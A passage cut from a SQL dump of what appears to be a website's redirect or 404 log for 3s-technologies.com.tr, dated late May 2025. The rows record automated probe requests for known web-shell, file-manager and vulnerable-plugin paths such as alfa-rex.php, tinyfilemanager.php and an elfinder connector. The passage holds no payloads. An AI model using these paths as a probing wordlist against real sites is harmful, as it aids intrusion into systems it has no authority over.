00:00:00',301),(39921,'http://3s-technologies.com.tr/tr/session.php',NULL,'','',3,0,'2025-05-29 02:47:54','0000-00-00 00:00:00',301),(39922,'http://3s-technologies.com.tr/tr/abe.php',NULL,'','',36,0,'2025-05-29 02:47:56','0000-00-00 00:00:00',301),(39923,'http://3s-technologies.com.tr/tr/sidwsi.php',NULL,'','',8,0,'2025-05-29 17:22:10','0000-00-00 00:00:00',301),(39924,'http://3s-technologies.com.tr/tr/minik.php',NULL,'','',23,0,'2025-05-29 17:22:11','0000-00-00 00:00:00',301),(39925,'http://3s-technologies.com.tr/tr/siteheads.php',NULL,'','',8,0,'2025-05-29 17:22:14','0000-00-00 00:00:00',301),(39926,'http://3s-technologies.com.tr/tr/wp-includes/js',NULL,'','',68,0,'2025-05-29 19:40:50','0000-00-00 00:00:00',301),(39927,'http://3s-technologies.com.tr/tr/wp-includes/pomo',NULL,'','',106,0,'2025-05-29 19:40:51','0000-00-00 00:00:00',301),(39928,'http://3s-technologies.com.tr/tr/wp-includes/rest-api',NULL,'','',113,0,'2025-05-29 19:40:51','0000-00-00 00:00:00',301),(39929,'http://3s-technologies.com.tr/tr/wp-includes/widgets',NULL,'','',65,0,'2025-05-29 19:40:52','0000-00-00 00:00:00',301),(39930,'http://3s-technologies.com.tr/tr/wp-admin/css',NULL,'','',89,0,'2025-05-29 19:40:52','0000-00-00 00:00:00',301),(39931,'http://3s-technologies.com.tr/tr/wp-admin/meta',NULL,'','',40,0,'2025-05-29 19:40:54','0000-00-00 00:00:00',301),(39932,'http://3s-technologies.com.tr/tr/wp-admin/network',NULL,'','',85,0,'2025-05-29 19:40:54','0000-00-00 00:00:00',301),(39933,'http://3s-technologies.com.tr/tr/wp-admin/user',NULL,'','',69,0,'2025-05-29 19:40:55','0000-00-00 00:00:00',301),(39934,'http://3s-technologies.com.tr/tr/wp-includes/ixr',NULL,'','',85,0,'2025-05-29 19:41:01','0000-00-00 00:00:00',301),(39935,'http://3s-technologies.com.tr/tr/wp-includes/requests',NULL,'','',83,0,'2025-05-29 19:41:01','0000-00-00 00:00:00',301),(39936,'http://3s-technologies.com.tr/tr/wp-includes/text',NULL,'','',67,0,'2025-05-29 19:41:02','0000-00-00 00:00:00',301),(39937,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/inc',NULL,'','',19,0,'2025-05-29 19:41:04','0000-00-00 00:00:00',301),(39938,'http://3s-technologies.com.tr/tr/wp-content/plugins/ninja-forms',NULL,'','',19,0,'2025-05-29 19:41:04','0000-00-00 00:00:00',301),(39939,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins',NULL,'','',19,0,'2025-05-29 19:41:05','0000-00-00 00:00:00',301),(39940,'http://3s-technologies.com.tr/tr/wp-includes/images',NULL,'','',109,0,'2025-05-29 19:41:08','0000-00-00 00:00:00',301),(39941,'http://3s-technologies.com.tr/tr/local',NULL,'','',20,0,'2025-05-29 19:41:17','0000-00-00 00:00:00',301),(39942,'http://3s-technologies.com.tr/tr/system',NULL,'','',19,0,'2025-05-29 19:41:18','0000-00-00 00:00:00',301),(39943,'http://3s-technologies.com.tr/tr/template',NULL,'','',20,0,'2025-05-29 19:41:18','0000-00-00 00:00:00',301),(39944,'http://3s-technologies.com.tr/tr/php',NULL,'','',19,0,'2025-05-29 19:41:22','0000-00-00 00:00:00',301),(39945,'http://3s-technologies.com.tr/tr/wp-includes/assets',NULL,'','',47,0,'2025-05-29 19:41:22','0000-00-00 00:00:00',301),(39946,'http://3s-technologies.com.tr/tr/wp-includes/block-supports',NULL,'','',60,0,'2025-05-29 19:41:25','0000-00-00 00:00:00',301),(39947,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache',NULL,'','',24,0,'2025-05-29 19:41:25','0000-00-00 00:00:00',301),(39948,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content',NULL,'','',25,0,'2025-05-29 19:41:26','0000-00-00 00:00:00',301),(39949,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints',NULL,'','',61,0,'2025-05-29 19:41:27','0000-00-00 00:00:00',301),(39950,'http://3s-technologies.com.tr/tr/wp-includes/requests/cookie',NULL,'','',28,0,'2025-05-29 19:41:28','0000-00-00 00:00:00',301),(39951,'http://3s-technologies.com.tr/tr/wp-includes/requests/proxy',NULL,'','',26,0,'2025-05-29 19:41:28','0000-00-00 00:00:00',301),(39952,'http://3s-technologies.com.tr/tr/wp-includes/requests/response',NULL,'','',32,0,'2025-05-29 19:41:29','0000-00-00 00:00:00',301),(39953,'http://3s-technologies.com.tr/tr/wp-includes/requests/transport',NULL,'','',20,0,'2025-05-29 19:41:29','0000-00-00 00:00:00',301),(39954,'http://3s-technologies.com.tr/tr/wp-includes/requests/utility',NULL,'','',20,0,'2025-05-29 19:41:30','0000-00-00 00:00:00',301),(39955,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror',NULL,'','',72,0,'2025-05-29 19:41:31','0000-00-00 00:00:00',301),(39956,'http://3s-technologies.com.tr/tr/wp-includes/requests/exception/http',NULL,'','',19,0,'2025-05-29 19:41:31','0000-00-00 00:00:00',301),(39957,'http://3s-technologies.com.tr/tr/wp-includes/js/crop',NULL,'','',69,0,'2025-05-29 19:41:32','0000-00-00 00:00:00',301),(39958,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal',NULL,'','',61,0,'2025-05-29 19:41:32','0000-00-00 00:00:00',301),(39959,'http://3s-technologies.com.tr/tr/wp-includes/images/media',NULL,'','',66,0,'2025-05-29 19:41:33','0000-00-00 00:00:00',301),(39960,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw',NULL,'','',21,0,'2025-05-29 19:41:34','0000-00-00 00:00:00',301),(39961,'http://3s-technologies.com.tr/tr/wp-includes/requests/exception',NULL,'','',20,0,'2025-05-29 19:41:35','0000-00-00 00:00:00',301),(39962,'http://3s-technologies.com.tr/tr/wp-includes/requests/auth',NULL,'','',20,0,'2025-05-29 19:41:35','0000-00-00 00:00:00',301),(39963,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src',NULL,'','',48,0,'2025-05-29 19:41:36','0000-00-00 00:00:00',301),(39964,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers',NULL,'','',70,0,'2025-05-29 19:41:36','0000-00-00 00:00:00',301),(39965,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/engine',NULL,'','',20,0,'2025-05-29 19:41:37','0000-00-00 00:00:00',301),(39966,'http://3s-technologies.com.tr/tr/wp-includes/php-compat',NULL,'','',73,0,'2025-05-29 19:41:38','0000-00-00 00:00:00',301),(39967,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer',NULL,'','',113,0,'2025-05-29 19:41:39','0000-00-00 00:00:00',301),(39968,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat',NULL,'','',38,0,'2025-05-29 19:41:40','0000-00-00 00:00:00',301),(39969,'http://3s-technologies.com.tr/tr/wp-includes/style-engine',NULL,'','',50,0,'2025-05-29 19:41:41','0000-00-00 00:00:00',301),(39970,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat',NULL,'','',37,0,'2025-05-29 19:41:41','0000-00-00 00:00:00',301),(39971,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm',NULL,'','',66,0,'2025-05-29 19:41:42','0000-00-00 00:00:00',301),(39972,'http://3s-technologies.com.tr/tr/wp-admin/css/colors',NULL,'','',66,0,'2025-05-29 19:41:42','0000-00-00 00:00:00',301),(39973,'http://3s-technologies.com.tr/tr/admin/fckeditor/editor/filemanager',NULL,'','',20,0,'2025-05-29 19:41:43','0000-00-00 00:00:00',301),(39974,'https://3s-technologies.com.tr/tr/?option=com_avreloaded&view=popup',NULL,'','',1,0,'2025-05-30 07:51:44','0000-00-00 00:00:00',301),(39975,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder-1.1/src/connectors/php/connector.php',NULL,'','',1,0,'2025-05-30 08:47:24','0000-00-00 00:00:00',301),(39976,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/shop.php',NULL,'','',2,0,'2025-05-30 20:36:56','0000-00-00 00:00:00',301),(39977,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/sxo.php',NULL,'','',2,0,'2025-05-30 20:36:57','0000-00-00 00:00:00',301),(39978,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/worksec.php',NULL,'','',5,0,'2025-05-30 20:36:57','0000-00-00 00:00:00',301),(39979,'http://3s-technologies.com.tr/tr/.well-known/afcsthua.php',NULL,'','',2,0,'2025-05-30 20:36:58','0000-00-00 00:00:00',301),(39980,'http://3s-technologies.com.tr/tr/.well-known/apap.php',NULL,'','',9,0,'2025-05-30 20:36:59','0000-00-00 00:00:00',301),(39981,'http://3s-technologies.com.tr/tr/.well-known/bqdoemhl.php',NULL,'','',2,0,'2025-05-30 20:37:00','0000-00-00 00:00:00',301),(39982,'http://3s-technologies.com.tr/tr/.well-known/cihjbmjk.php',NULL,'','',5,0,'2025-05-30 20:37:00','0000-00-00 00:00:00',301),(39983,'http://3s-technologies.com.tr/tr/.well-known/classwithtostring.php',NULL,'','',54,0,'2025-05-30 20:37:01','0000-00-00 00:00:00',301),(39984,'http://3s-technologies.com.tr/tr/.well-known/eror.php',NULL,'','',2,0,'2025-05-30 20:37:01','0000-00-00 00:00:00',301),(39985,'http://3s-technologies.com.tr/tr/.well-known/esjmskva.php',NULL,'','',2,0,'2025-05-30 20:37:02','0000-00-00 00:00:00',301),(39986,'http://3s-technologies.com.tr/tr/.well-known/fm.php',NULL,'','',11,0,'2025-05-30 20:37:02','0000-00-00 00:00:00',301),(39987,'http://3s-technologies.com.tr/tr/.well-known/info.php',NULL,'','',5,0,'2025-05-30 20:37:04','0000-00-00 00:00:00',301),(39988,'http://3s-technologies.com.tr/tr/.well-known/ktlldmmx.php',NULL,'','',2,0,'2025-05-30 20:37:05','0000-00-00 00:00:00',301),(39989,'http://3s-technologies.com.tr/tr/.well-known/mfeypwze.php',NULL,'','',2,0,'2025-05-30 20:37:05','0000-00-00 00:00:00',301),(39990,'http://3s-technologies.com.tr/tr/.well-known/nzhlgkwk.php',NULL,'','',2,0,'2025-05-30 20:37:06','0000-00-00 00:00:00',301),(39991,'http://3s-technologies.com.tr/tr/.well-known/oduexytv.php',NULL,'','',2,0,'2025-05-30 20:37:06','0000-00-00 00:00:00',301),(39992,'http://3s-technologies.com.tr/tr/.well-known/worksec.php',NULL,'','',9,0,'2025-05-30 20:37:07','0000-00-00 00:00:00',301),(39993,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/am100.jpg',NULL,'','',1,0,'2025-05-31 08:25:51','0000-00-00 00:00:00',301),(39994,'https://3s-technologies.com.tr/tr/?view=popup&option=com_avreloaded',NULL,'','',2,0,'2025-05-31 13:05:37','0000-00-00 00:00:00',301),(39995,'http://3s-technologies.com.tr/tr/sb.php',NULL,'','',10,0,'2025-05-31 16:12:12','0000-00-00 00:00:00',301),(39996,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyseventeen/page/index.php',NULL,'','',14,0,'2025-05-31 16:12:20','0000-00-00 00:00:00',301),(39997,'http://3s-technologies.com.tr/tr/bp.php?taf',NULL,'','',9,0,'2025-05-31 16:12:23','0000-00-00 00:00:00',301),(39998,'http://3s-technologies.com.tr/tr/gecko-new.php',NULL,'','',90,0,'2025-05-31 16:12:24','0000-00-00 00:00:00',301),(39999,'http://3s-technologies.com.tr/tr/wp-admin/network/network.php',NULL,'','',58,0,'2025-05-31 16:12:25','0000-00-00 00:00:00',301),(40000,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal/index.php',NULL,'','',12,0,'2025-05-31 16:12:26','0000-00-00 00:00:00',301),(40001,'http://3s-technologies.com.tr/tr/wp-includes/certificates/chosen.php',NULL,'','',23,0,'2025-05-31 16:12:28','0000-00-00 00:00:00',301),(40002,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/widgets/about.php',NULL,'','',13,0,'2025-05-31 16:12:29','0000-00-00 00:00:00',301),(40003,'http://3s-technologies.com.tr/tr/wp-content/plugins/classic-editor',NULL,'','',10,0,'2025-05-31 16:12:37','0000-00-00 00:00:00',301),(40004,'http://3s-technologies.com.tr/tr/tinyfilemanager/tinyfilemanager.php',NULL,'','',15,0,'2025-05-31 16:12:41','0000-00-00 00:00:00',301),(40005,'http://3s-technologies.com.tr/tr/wp-content/plugins/goods.php',NULL,'','',8,0,'2025-05-31 16:12:41','0000-00-00 00:00:00',301),(40006,'http://3s-technologies.com.tr/tr/wp-admin/ccx',NULL,'','',8,0,'2025-05-31 16:12:43','0000-00-00 00:00:00',301),(40007,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/muse.php',NULL,'','',15,0,'2025-05-31 16:12:43','0000-00-00 00:00:00',301),(40008,'http://3s-technologies.com.tr/tr/wp-includes/text/autoload_classmap.php',NULL,'','',69,0,'2025-05-31 16:12:48','0000-00-00 00:00:00',301),(40009,'http://3s-technologies.com.tr/tr/upload/index.php',NULL,'','',4,0,'2025-05-31 16:12:50','0000-00-00 00:00:00',301),(40010,'http://3s-technologies.com.tr/tr/wp-includes/id3/wp-conflg.php',NULL,'','',9,0,'2025-05-31 16:12:51','0000-00-00 00:00:00',301),(40011,'http://3s-technologies.com.tr/tr/wp-includes/bk/index.php',NULL,'','',15,0,'2025-05-31 16:12:52','0000-00-00 00:00:00',301),(40012,'http://3s-technologies.com.tr/tr/index/layout.php',NULL,'','',4,0,'2025-05-31 16:12:53','0000-00-00 00:00:00',301),(40013,'http://3s-technologies.com.tr/tr/wp-admin.phphttps:/diegun.com/autoload_classmap.php',NULL,'','',12,0,'2025-05-31 16:12:55','0000-00-00 00:00:00',301),(40014,'http://3s-technologies.com.tr/tr/files.php',NULL,'','',116,0,'2025-05-31 16:13:01','0000-00-00 00:00:00',301),(40015,'http://3s-technologies.com.tr/tr/wp-includes/class-controller-theme-comment.php',NULL,'','',4,0,'2025-05-31 16:13:01','0000-00-00 00:00:00',301),(40016,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/gebase.php',NULL,'','',6,0,'2025-05-31 16:13:07','0000-00-00 00:00:00',301),(40017,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/doc.php',NULL,'','',34,0,'2025-05-31 16:13:09','0000-00-00 00:00:00',301),(40018,'http://3s-technologies.com.tr/tr/wp-content/languages/themes',NULL,'','',16,0,'2025-05-31 16:13:13','0000-00-00 00:00:00',301),(40019,'http://3s-technologies.com.tr/tr/wp-content/uploads/admin.php',NULL,'','',56,0,'2025-05-31 16:13:15','0000-00-00 00:00:00',301),(40020,'http://3s-technologies.com.tr/tr/wp-includes/js/jcrop',NULL,'','',32,0,'2025-05-31 16:13:16','0000-00-00 00:00:00',301),(40021,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/asasx.php',NULL,'','',5,0,'2025-05-31 16:13:18','0000-00-00 00:00:00',301),(40022,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-sec/ab.php',NULL,'','',8,0,'2025-05-31 16:13:22','0000-00-00 00:00:00',301),(40023,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight',NULL,'','',44,0,'2025-05-31 16:13:25','0000-00-00 00:00:00',301),(40024,'http://3s-technologies.com.tr/tr/he.php',NULL,'','',71,0,'2025-05-31 16:13:28','0000-00-00 00:00:00',301),(40025,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/about.php',NULL,'','',6,0,'2025-05-31 16:13:31','0000-00-00 00:00:00',301),(40026,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023',NULL,'','',12,0,'2025-05-31 16:13:36','0000-00-00 00:00:00',301),(40027,'http://3s-technologies.com.tr/tr/layout.php',NULL,'','',37,0,'2025-05-31 16:13:36','0000-00-00 00:00:00',301),(40028,'http://3s-technologies.com.tr/tr/file2.php',NULL,'','',205,0,'2025-05-31 16:13:37','0000-00-00 00:00:00',301),(40029,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/index.php',NULL,'','',36,0,'2025-05-31 16:13:42','0000-00-00 00:00:00',301),(40030,'http://3s-technologies.com.tr/tr/assets/images/niil.php',NULL,'','',8,0,'2025-05-31 16:13:42','0000-00-00 00:00:00',301),(40031,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour',NULL,'','',22,0,'2025-05-31 16:13:43','0000-00-00 00:00:00',301),(40032,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes',NULL,'','',10,0,'2025-05-31 16:13:46','0000-00-00 00:00:00',301),(40033,'http://3s-technologies.com.tr/tr/past.php',NULL,'','',39,0,'2025-05-31 16:13:47','0000-00-00 00:00:00',301),(40034,'http://3s-technologies.com.tr/tr/wp-content/b.php',NULL,'','',8,0,'2025-05-31 16:13:49','0000-00-00 00:00:00',301),(40035,'http://3s-technologies.com.tr/tr/wp-includes/blocks/block',NULL,'','',39,0,'2025-05-31 16:13:51','0000-00-00 00:00:00',301),(40036,'http://3s-technologies.com.tr/tr/asasx.php',NULL,'','',162,0,'2025-05-31 16:13:52','0000-00-00 00:00:00',301),(40037,'http://3s-technologies.com.tr/tr/assets/css',NULL,'','',10,0,'2025-05-31 16:13:52','0000-00-00 00:00:00',301),(40038,'http://3s-technologies.com.tr/tr/.qiodetme.php',NULL,'','',6,0,'2025-05-31 16:13:54','0000-00-00 00:00:00',301),(40039,'http://3s-technologies.com.tr/tr/wp-includes/blocks/autoload_classmap.php',NULL,'','',12,0,'2025-05-31 16:13:58','0000-00-00 00:00:00',301),(40040,'http://3s-technologies.com.tr/tr/wp-includes/blocks/calendar',NULL,'','',10,0,'2025-05-31 16:13:59','0000-00-00 00:00:00',301),(40041,'http://3s-technologies.com.tr/tr/indeex.php',NULL,'','',42,0,'2025-05-31 16:14:00','0000-00-00 00:00:00',301),(40042,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani',NULL,'','',28,0,'2025-05-31 16:14:00','0000-00-00 00:00:00',301),(40043,'http://3s-technologies.com.tr/tr/f35.php',NULL,'','',305,0,'2025-05-31 16:14:01','0000-00-00 00:00:00',301),(40044,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/inc/customizer/custom-controls/description/index.php',NULL,'','',4,0,'2025-05-31 16:14:04','0000-00-00 00:00:00',301),(40045,'http://3s-technologies.com.tr/tr/jquery.php',NULL,'','',71,0,'2025-05-31 16:14:04','0000-00-00 00:00:00',301),(40046,'http://3s-technologies.com.tr/tr/wp-content/uploads/de_fb_uploads/b.php',NULL,'','',61,0,'2025-05-31 16:14:07','0000-00-00 00:00:00',301),(40047,'http://3s-technologies.com.tr/tr/.tmb',NULL,'','',22,0,'2025-05-31 16:14:07','0000-00-00 00:00:00',301),(40048,'http://3s-technologies.com.tr/tr/wordpress/about.php',NULL,'','',7,0,'2025-05-31 16:14:12','0000-00-00 00:00:00',301),(40049,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/auth',NULL,'','',10,0,'2025-05-31 16:14:15','0000-00-00 00:00:00',301),(40050,'http://3s-technologies.com.tr/tr/wp-includes/blocks/term-description',NULL,'','',9,0,'2025-05-31 16:14:15','0000-00-00 00:00:00',301),(40051,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension/ultra.php',NULL,'','',112,0,'2025-05-31 16:14:18','0000-00-00 00:00:00',301),(40052,'http://3s-technologies.com.tr/tr/images/index.php',NULL,'','',48,0,'2025-05-31 16:14:18','0000-00-00 00:00:00',301),(40053,'http://3s-technologies.com.tr/tr/wp-includes/certificates/autoload_classmap.php',NULL,'','',11,0,'2025-05-31 16:14:21','0000-00-00 00:00:00',301),(40054,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/list-reusable-blocks/index.php',NULL,'','',4,0,'2025-05-31 16:14:26','0000-00-00 00:00:00',301),(40055,'http://3s-technologies.com.tr/tr/wp-admin/css/forbidden.php',NULL,'','',8,0,'2025-05-31 16:14:28','0000-00-00 00:00:00',301),(40056,'http://3s-technologies.com.tr/tr/wp-includes/blocks/freeform',NULL,'','',12,0,'2025-05-31 16:14:28','0000-00-00 00:00:00',301),(40057,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee',NULL,'','',15,0,'2025-05-31 16:14:31','0000-00-00 00:00:00',301),(40058,'http://3s-technologies.com.tr/tr/zwso.php',NULL,'','',202,0,'2025-05-31 16:14:33','0000-00-00 00:00:00',301),(40059,'http://3s-technologies.com.tr/tr/wp-includes/requests/library',NULL,'','',71,0,'2025-05-31 16:14:34','0000-00-00 00:00:00',301),(40060,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings',NULL,'','',47,0,'2025-05-31 16:14:36','0000-00-00 00:00:00',301),(40061,'http://3s-technologies.com.tr/tr/wp-includes/ixr/chosen.php',NULL,'','',26,0,'2025-05-31 16:14:38','0000-00-00 00:00:00',301),(40062,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/admin.php',NULL,'','',21,0,'2025-05-31 16:14:42','0000-00-00 00:00:00',301),(40063,'http://3s-technologies.com.tr/tr/.alf.php',NULL,'','',43,0,'2025-05-31 16:14:42','0000-00-00 00:00:00',301),(40064,'http://3s-technologies.com.tr/tr/sim.php',NULL,'','',62,0,'2025-05-31 16:14:45','0000-00-00 00:00:00',301),(40065,'http://3s-technologies.com.tr/tr/wp-includes/requests/autoload_classmap.php',NULL,'','',9,0,'2025-05-31 16:14:48','0000-00-00 00:00:00',301),(40066,'http://3s-technologies.com.tr/tr/flower.php',NULL,'','',309,0,'2025-05-31 16:14:50','0000-00-00 00:00:00',301),(40067,'http://3s-technologies.com.tr/tr/private',NULL,'','',12,0,'2025-05-31 16:14:53','0000-00-00 00:00:00',301),(40068,'http://3s-technologies.com.tr/tr/wp-content/atomlib.php',NULL,'','',43,0,'2025-05-31 16:14:54','0000-00-00 00:00:00',301),(40069,'http://3s-technologies.com.tr/tr/wp-includes/blocks/latest-comments',NULL,'','',10,0,'2025-05-31 16:14:56','0000-00-00 00:00:00',301),(40070,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets',NULL,'','',73,0,'2025-05-31 16:14:58','0000-00-00 00:00:00',301),(40071,'http://3s-technologies.com.tr/tr/wp-content/fonts',NULL,'','',10,0,'2025-05-31 16:15:01','0000-00-00 00:00:00',301),(40072,'http://3s-technologies.com.tr/tr/wp-includes/id3/layout.php',NULL,'','',4,0,'2025-05-31 16:15:02','0000-00-00 00:00:00',301),(40073,'http://3s-technologies.com.tr/tr/wp-includes/ixr/autoload_classmap.php',NULL,'','',62,0,'2025-05-31 16:15:04','0000-00-00 00:00:00',301),(40074,'http://3s-technologies.com.tr/tr/wp-includes/blocks/block/index.php',NULL,'','',4,0,'2025-05-31 16:15:04','0000-00-00 00:00:00',301),(40075,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/layout.php',NULL,'','',4,0,'2025-05-31 16:15:06','0000-00-00 00:00:00',301),(40076,'http://3s-technologies.com.tr/tr/wp-admin/network/autoload_classmap.php',NULL,'','',8,0,'2025-05-31 16:15:10','0000-00-00 00:00:00',301),(40077,'http://3s-technologies.com.tr/tr/wp-content/uploads/cong.php',NULL,'','',32,0,'2025-05-31 16:15:11','0000-00-00 00:00:00',301),(40078,'http://3s-technologies.com.tr/tr/assets/atomlib.php',NULL,'','',11,0,'2025-05-31 16:15:15','0000-00-00 00:00:00',301),(40079,'http://3s-technologies.com.tr/tr/moddofuns.php',NULL,'','',15,0,'2025-05-31 16:15:18','0000-00-00 00:00:00',301),(40080,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-tag.php',NULL,'','',4,0,'2025-05-31 16:15:19','0000-00-00 00:00:00',301),(40081,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/poly1305',NULL,'','',4,0,'2025-05-31 16:15:21','0000-00-00 00:00:00',301),(40082,'http://3s-technologies.com.tr/tr/wp-includes/blocks/shortcode/index.php',NULL,'','',19,0,'2025-05-31 16:15:23','0000-00-00 00:00:00',301),(40083,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/index.php',NULL,'','',14,0,'2025-05-31 16:15:24','0000-00-00 00:00:00',301),(40084,'http://3s-technologies.com.tr/tr/assets/bypass.php',NULL,'','',18,0,'2025-05-31 16:15:25','0000-00-00 00:00:00',301),(40085,'http://3s-technologies.com.tr/tr/abouts.php',NULL,'','',10,0,'2025-05-31 16:15:26','0000-00-00 00:00:00',301),(40086,'http://3s-technologies.com.tr/tr/about/classwithtostring.php',NULL,'','',4,0,'2025-05-31 16:15:28','0000-00-00 00:00:00',301),(40087,'http://3s-technologies.com.tr/tr/about/layout.php',NULL,'','',4,0,'2025-05-31 16:15:30','0000-00-00 00:00:00',301),(40088,'http://3s-technologies.com.tr/tr/we.php',NULL,'','',187,0,'2025-05-31 16:15:32','0000-00-00 00:00:00',301),(40089,'http://3s-technologies.com.tr/tr/wp-includes/blocks/site-logo',NULL,'','',10,0,'2025-05-31 16:15:33','0000-00-00 00:00:00',301),(40090,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/search/alfa-rex.php',NULL,'','',8,0,'2025-05-31 16:15:34','0000-00-00 00:00:00',301),(40091,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/admin.php',NULL,'','',27,0,'2025-05-31 16:15:37','0000-00-00 00:00:00',301),(40092,'http://3s-technologies.com.tr/tr/webadmin.php',NULL,'','',82,0,'2025-05-31 16:15:39','0000-00-00 00:00:00',301),(40093,'http://3s-technologies.com.tr/tr/fw/layout.php',NULL,'','',4,0,'2025-05-31 16:15:40','0000-00-00 00:00:00',301),(40094,'http://3s-technologies.com.tr/tr/autoload_classmap/function.php',NULL,'','',85,0,'2025-05-31 16:15:41','0000-00-00 00:00:00',301),(40095,'http://3s-technologies.com.tr/tr/ioxi-o.php',NULL,'','',411,0,'2025-05-31 16:15:44','0000-00-00 00:00:00',301),(40096,'http://3s-technologies.com.tr/tr/permessi-linux-questi-sconosciuti',NULL,'','',4,0,'2025-05-31 16:15:52','0000-00-00 00:00:00',301),(40097,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-widgets',NULL,'','',11,0,'2025-05-31 16:15:54','0000-00-00 00:00:00',301),(40098,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore',NULL,'','',36,0,'2025-05-31 16:16:00','0000-00-00 00:00:00',301),(40099,'http://3s-technologies.com.tr/tr/wp-admin/js',NULL,'','',98,0,'2025-05-31 16:16:02','0000-00-00 00:00:00',301),(40100,'http://3s-technologies.com.tr/tr/wp-includes/blocks/calendar/index.php',NULL,'','',25,0,'2025-05-31 16:16:05','0000-00-00 00:00:00',301),(40101,'http://3s-technologies.com.tr/tr/wp-admin/js/privacy-tools.min.php',NULL,'','',11,0,'2025-05-31 19:10:02','0000-00-00 00:00:00',301),(40102,'http://3s-technologies.com.tr/tr/wp-content/upgrade/sx.php',NULL,'','',9,0,'2025-05-31 19:10:09','0000-00-00 00:00:00',301),(40103,'http://3s-technologies.com.tr/tr/wp-includes/customize/themes.php',NULL,'','',2,0,'2025-05-31 19:10:10','0000-00-00 00:00:00',301),(40104,'http://3s-technologies.com.tr/tr/wp-admin/images/chosen.php',NULL,'','',20,0,'2025-05-31 19:10:13','0000-00-00 00:00:00',301),(40105,'http://3s-technologies.com.tr/tr/lufix.php/lv.php',NULL,'','',1,0,'2025-05-31 19:10:15','0000-00-00 00:00:00',301),(40106,'http://3s-technologies.com.tr/tr/wp-content/plugins/envato-market/inc/class-envato-market-github.php',NULL,'','',35,0,'2025-05-31 22:24:32','0000-00-00 00:00:00',301),(40107,'http://3s-technologies.com.tr/tr/wp-admin/user/sx.php',NULL,'','',9,0,'2025-05-31 22:24:33','0000-00-00 00:00:00',301),(40108,'http://3s-technologies.com.tr/tr/wp-admin/images/wp-settings.phtml',NULL,'','',2,0,'2025-05-31 22:24:37','0000-00-00 00:00:00',301),(40109,'http://3s-technologies.com.tr/tr/wp-content/uploads/cache.php',NULL,'','',31,0,'2025-05-31 22:24:37','0000-00-00 00:00:00',301),(40110,'http://3s-technologies.com.tr/tr/images/class-config.php',NULL,'','',79,0,'2025-06-01 04:22:51','0000-00-00 00:00:00',301),(40111,'http://3s-technologies.com.tr/tr/yox.php',NULL,'','',30,0,'2025-06-01 04:22:52','0000-00-00 00:00:00',301),(40112,'http://3s-technologies.com.tr/tr/wp-signin.php',NULL,'','',85,0,'2025-06-01 04:22:53','0000-00-00 00:00:00',301),(40113,'http://3s-technologies.com.tr/tr/help.php',NULL,'','',52,0,'2025-06-01 04:22:55','0000-00-00 00:00:00',301),(40114,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-library',NULL,'','',40,0,'2025-06-01 04:22:59','0000-00-00 00:00:00',301),(40115,'http://3s-technologies.com.tr/tr/revision.php',NULL,'','',48,0,'2025-06-01 04:23:00','0000-00-00 00:00:00',301),(40116,'http://3s-technologies.com.tr/tr/news.php',NULL,'','',54,0,'2025-06-01 04:23:01','0000-00-00 00:00:00',301),(40117,'http://3s-technologies.com.tr/tr/wp-admin/network/plugins.php',NULL,'','',103,0,'2025-06-01 04:23:20','0000-00-00 00:00:00',301),(40118,'http://3s-technologies.com.tr/tr/ab.php',NULL,'','',75,0,'2025-06-01 04:23:25','0000-00-00 00:00:00',301),(40119,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise',NULL,'','',59,0,'2025-06-01 04:23:28','0000-00-00 00:00:00',301),(40120,'http://3s-technologies.com.tr/tr/wp-corn-sample.php',NULL,'','',33,0,'2025-06-01 04:23:55','0000-00-00 00:00:00',301),(40121,'http://3s-technologies.com.tr/tr/settings.php',NULL,'','',71,0,'2025-06-01 